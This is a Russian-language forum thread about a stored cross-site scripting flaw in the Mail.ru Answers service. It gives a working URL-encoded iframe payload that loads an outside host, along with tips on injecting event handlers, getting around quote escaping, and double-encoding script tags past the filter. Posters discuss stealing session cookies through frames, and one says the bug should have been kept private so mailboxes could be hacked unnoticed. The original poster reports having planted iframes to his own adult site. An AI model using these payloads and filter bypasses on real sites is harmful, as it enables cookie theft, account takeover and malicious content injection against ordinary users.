Сегодня мной была обнаружена уязвимость на Проекте Ответы Mail>ru В результате можно было встроить айфрейм с сайтом произвольным в коментарии и в вопросы... и соответственно любой вредоносный код... примеры здесь примеры примеры примеры А также были фреймы с моим порносайтом .. но их удалили Собственно -рассказываю как ))) все теги фильтруются и обрезаются... с этим не поспоришь -майловцы молодцы ))) Но они упустили кое что если теги заурленкодить Можно здесь То они на мейлру уже декодируются а дальше не фильтруются!!!! и в итоге получаем .... хехех ... попробую на ачате ))) %3Ciframe src%3Dhttp%3A%2F%2Fantispid.jino-net.ru%2FWM.html width%3D1 height%3D1%3E%3C%2Fiframe%3E на ачате форум фильтрует все ... точнее не перекодирует обратно урленкод.. PHP: %3Ciframe src%3Dhttp%3A%2F%2Fantispid.jino-net.ru%2FWM.html width%3D1 height%3D1%3E%3C%2Fiframe%3E вот такая загогулина... и ее постим в каментах или в вопросе... и получаем фрейм.. также можно любые теги.... кроме HTML: <script> Вотс... правда я как законопослушный гражданин -написал в суппорт и админам .. так что ..вот такая вот загогулина ))
Я только не очень силен в яваскрипте.... но можно ведь как то получить доступ через фрейм к родительскому окну ?
скрпты тоже можно писать !!!! Опять же урленкодим.... таким образом... PHP: <input type=button onclick=скрипт произвольный> одно но... кавычки заслешиваются... так что серьезного ничего не сделать.... PS // хмм... и кавычки можно обойти ))
Таак... Скрипты в виде <script> </script> тоже можно писать -требуется двойное урленкодирование Однако главная проблема -почему нельзя передать куки на скрипт .. -это то , что ссылки фильтруются -то есть если есть http -то перед ним ставятся теги <noindex> , <nofollow> и которые портят код . Если у кого есить идеи -выкладывайте
во первых зря то сообщил админам маила во вторых зря что выложил баг в паблик этоже активна хсс в маил ру получить доступ к 1вому фрэйму (где авторизованные куки) через родительское окно в джаваскрипт можно так Code: parent.имя фрэйма.document.cookie если бы не ступил то мог бы беспалива хакать мыльники
нельзя так... Да я и пробовал это разные домены - и получить доступ из одного домена в другой нельзя PS да может и зря... конечно...но гражданский долг меня позвал )))
Нет ..это относительная ссылка считается... и ссылка будет вида http://otvet.mail.ru//hacker.ru Да и что сейчас обсуждать? Все равно уязвимость прикрыли.... Может в следующем году снова облажаются)) Как в этом... (год назад эта уязвимость была-потом прикрыли , а в этом году снова появилась))) )
